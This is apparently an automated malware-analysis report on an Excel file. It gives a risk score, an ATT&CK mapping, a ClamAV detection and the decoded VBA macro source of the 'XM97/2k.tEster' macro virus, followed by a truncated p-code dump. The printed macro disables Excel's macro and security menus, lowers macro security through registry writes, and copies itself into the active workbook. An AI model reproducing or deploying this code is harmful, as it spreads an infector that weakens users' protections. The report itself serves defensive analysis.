MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is an Excel file containing VBA macros. The script attempts to modify Excel security settings by writing to the registry keys HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6 and HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level. It then attempts to save the workbook, potentially to execute a payload or establish persistence. The ClamAV detection 'Xls.Trojan.Tester-3' further supports its malicious nature.
Heuristics 1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5944 bytes |
SHA-256: 9418001078baf582ace9987c320032853c5b880e9dafdee710fbc719192de9ed |
|||
|
Detection
ClamAV:
Xls.Trojan.Tester-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Tento_sešit"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XM97/2k.tEster
Sub Workbook_Deactivate()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
CommandBars("Tools").Controls("Macro").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = 0&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1&
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule 'cz
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule 'us
Set ActiveBook = ActiveWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule 'de
Set ThisBook = ThisWorkbook.VBProject.VBComponents("Tento_sešit").CodeModule 'cz
Set ThisBook = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule 'us
Set ThisBook = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule 'de
vxCopy = ThisBook.Lines(1, ThisBook.countoflines)
If ActiveBook.Lines(1, 1) <> "'XM97/2k.tEster" Then
ActiveBook.deletelines 1, ActiveBook.countoflines
ActiveBook.insertlines 1, vxCopy
If ActiveWorkbook.Path = "" Then
ActiveWorkbook.SaveAs ActiveWorkbook.FullName
Else
ActiveWorkbook.Save
End If
End If
'XM97/2k.tEster by gl_st0rm of [mions]
End Sub
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/d689602d65f2471f966bba7c893ec1a5.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Tento_sešit - 3550 bytes
' Line #0:
' QuoteRem 0x0000 0x000E "XM97/2k.tEster"
' Line #1:
' Line #2:
' FuncDefn (Sub deletelines())
' Line #3:
' OnError (Resume Next)
' Line #4:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd Controls 0x0001
' ArgsMemLd Enabled 0x0001
' MemSt System
' Line #5:
' LitVarSpecial (False)
' LitStr 0x0005 "Macro"
' LitStr 0x0005 "Tools"
' ArgsLd Controls 0x0001
' ArgsMemLd Enabled 0x0001
' MemSt System
' Line #6:
' LitDI4 0x0000 0x0000
' LitStr 0x0000 ""
' LitStr 0x0045 "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
' LitStr 0x0008 "Options6"
' Ld PrivateProfileString
' ArgsMemSt book 0x0003
' Line #7:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security"
' LitStr 0x0005 "Level"
' Ld PrivateProfileString
' ArgsMemSt book 0x0003
' Line #8:
' SetStmt
' LitStr 0x000B "Tento_sešit"
' Ld VBProject
' MemLd VBComponents
' ArgsMemLd CodeModule 0x0001
' MemLd Item
' Set _B_var_ActiveBook
' QuoteRem 0x0058 0x0002 "cz"
' Line #9:
' SetStmt
' LitStr 0x000C "ThisWorkbook"
' Ld VBProject
' MemLd VBComponents
' ArgsMemLd CodeModule 0x0001
' MemLd Item
' Set _B_var_ActiveBook
' QuoteRem 0x0058 0x0002 "us"
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.